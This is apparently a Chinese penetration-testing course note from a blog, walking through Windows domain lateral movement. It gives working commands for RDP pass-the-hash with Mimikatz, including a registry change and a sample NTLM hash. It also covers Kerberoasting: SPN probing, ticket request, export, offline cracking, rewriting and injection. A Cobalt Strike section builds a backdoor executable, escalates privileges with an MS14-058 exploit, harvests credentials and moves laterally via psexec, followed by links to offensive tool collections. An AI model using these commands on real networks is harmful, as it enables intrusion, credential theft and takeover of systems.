演示案例:
• 域横向移动RDP传递-Mimikatz
• 域横向移动SPN服务-探针,请求,导出,破解,重写
• 域横向移动测试流程一把梭哈-CobaltStrike初体验
案例1-域横向移动RDP传递-Mimikatz
除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。
RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断
RDP明文密码链接
windows: mstsc
mstsc.exe /console /v:192.168.3.21 /admin
linux: rdesktop 192.168.3.21:3389
Q:
解决:failed to open X11 display__囧囧_的博客-CSDN博客
RDP密文HASH链接
windows Server需要开启 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默认开启,同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持;
开启命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
开启后运行:
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"
一般在我的电脑——右键属性——远程设置
如果连接报错:出现身份验证错误/要求的函数不受支持的解决方案
windows专业版:打开gpedit.msc——计算机配置>管理模板>系统>凭据分配>加密数据库修正——选择启用并选择易受攻击
windows家庭版:打开gpedit.msc——找HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters(CredSSP\Parameters不存在则手动新建:左侧目录System点击右键,选择“新建 - 项”,输入文件夹名)——在Parameters 里 新建 DWORD(32位),名称:“AllowEncryptionOracle",值:2——再次连接远程桌面,若仍失败则重启电脑后再次尝试
案例2-域横向移动SPN服务-探针,请求,导出,破解,重写
kerberos中的spn详解 - 渗透测试中心 - 博客园
SPN(Service Principal Name服务主体名称)
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。
探针
setspn -q */*
setspn -q */* | findstr "MSSQL"setspn就是调用spn扫描,这是自带扫描
请求获取票据
# 删除缓存票据
klist purge
# powershell请求
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"
# mimikatz请求
mimikatz.exe "kerberos::ask /target:xxxx"
# 查看票据
klist
导出票据
# mimikatz
mimikatz.exe "kerberos::list /export"
破解票据
# 破解工具tgsrepcrack.py python3环境运行
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi
重写票据
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存利用
dir //xxx.xxx.xxx.xxx/c$案例3-域横向移动测试流程一把梭哈-CobaltStrike初体验
CobaltStrike也称CS打枪工具
参考:CobaltStrike使用指南
https://docs.qq.com/blankpage/DZlVaY3dzWlpRZlh3
大概流程:
启动-配置-监听-执行-上线-提权-信息收集(网络,凭证,定位等)-渗透
1.关于启动及配置讲解
2.关于提权及插件加载
3.关于信息收集命令讲解
4.关于视图自动化功能讲解
演示:
启动:
运行teamserver团队服务器:
./teamserver 团队服务器的ip地址 密码(有这个密码就连接到工具上去)
启动完后打开本地客户端
阿里云服务器要开启这个端口(注意!) 否则连接会超时奥!
连接成功:这样就进入到cs的工具画面
这就是它的简单启动
配置
启动完之后更重要的就是配置,它怎么上线。可以理解为它就是一款远控工具,这个远控工具里面又实现了一些功能,大部分攻击主机,我先要控制它再在上面做后续操作。下一步就是让对方上线,但是由于它是一个团队服务器,你搞的主机和我搞的主机怎么区分开呢?加入我和你都连接到终端,可以多个人连接上来一起攻击,但是怎么区分哪个是你的哪个是我的?要通过配置监听器来实现,从你这个监听器过来的就是你攻击的。监听器就是配置木马传输的管道!
如何配置监听器?
Beacon为内置的Listener,即在目标主机执行相应的payload,获取shell到CS上;其中包含DNS、HTTP、SMB。
Foreign为外部结合的Listener,常用于MSF的结合,例如获取meterpreter到MSF上。
下面生成后门文件:
点击attack——windows executable(常用)
现在我们把这个web.exe后门复制到2008r2webserver,执行,执行后:
(webadmin是当前用户权限)
现在要对它进行提权操作:
点击Access——elevate(提权)
自带只有两种提权方式,我们要加载插件:
插件在“涉及资源”之中,我们下面用第3条资源和第六条
插件该如何加载?(加载插件就是因为插件上有一些其他功能)
点击Cobalt strike——script manager(脚本管理器)——点击load上传插件
load过后 选中——点击Unload就是加载插件(再右键被控制的主机——Access——Elevate发现多了一些插件:)
这个插件就帮我搞了几个payload,三个提权exp,选中其中一个,比如ms14-058——选择监听器
点击launch后就会利用ms14-058对它进行攻击,如果速度过慢,就右键webadmin——session——sleep(设置为1或0)
由于已经提升到system权限,就用终端来执行(右键interact)
输入help可以查看命令
输入getuid,返回的就是system
现在已经得到这台主机的系统权限了,接下来就要进行内网渗透,并且要判断它的网络环境
接下来就是我们的第三步:信息收集
执行net view(执行它当前的网络环境)就会探测当前的网络架构:
这些信息不可能我们每个都收集一下,点击view——targets,所有探测的信息就会自动展示出来:(执行net view的时候就会加载出来)
还要判断是不是域环境:
输入net computers
还有一些命令比如 net dclist,获取当前dc列表,它就会获取域控地址
net 后tab可以查看一些命令
执行net user /domain 官方没有:就调用shell去执行——》shell net user /domain(得到域内用户)用shell就和在windows上一样
收集口令凭证:system右键(webadmin权限不够)——access——run mimikatz
收集到口令之后我也不可能一个个翻一个个看,怎么办?
点击view——选择credentials:可以看到获取的密码,都帮你记录好了
前期信息收集都差不多了(判断工作组,判断域,域内用户的信息收集,收集口令凭证等)
对收集到的目标进行攻击:比如我要攻击192.168.3.32——右键jump(就是对它进行攻击)——psexec
它就会调用jump的psexec来连接主机,尝试攻击。
其他操作自己慢慢摸索吧~
涉及资源:
https://github.com/nidem/kerberoast
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw 提取码: xiao
https://github.com/pandasec888/taowu-cobalt-strike
https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q 提取码:dtm2
https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug 提取码: taqu
https://github.com/DeEpinGhOst/Erebus
https://github.com/rsmudge/ElevateKit
https://github.com/harleyQu1nn/AggressorScripts
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/360-A-Team/CobaltStrike-Toolset
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/michalkoczwara/aggressor_scripts_collection
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/ramenOx3f/AggressorScripts
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/threatexpress/persistence-aggressor-script
https://github.com/threatexpress/aggressor-scripts
https://github.com/branthale/CobaltStrikeCNA
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/Und3rf10wl/Aggressor-scripts
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/vysec/Aggressor-VYSEC
https://github.com/threatexpresslaggressor-scripts
1171
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
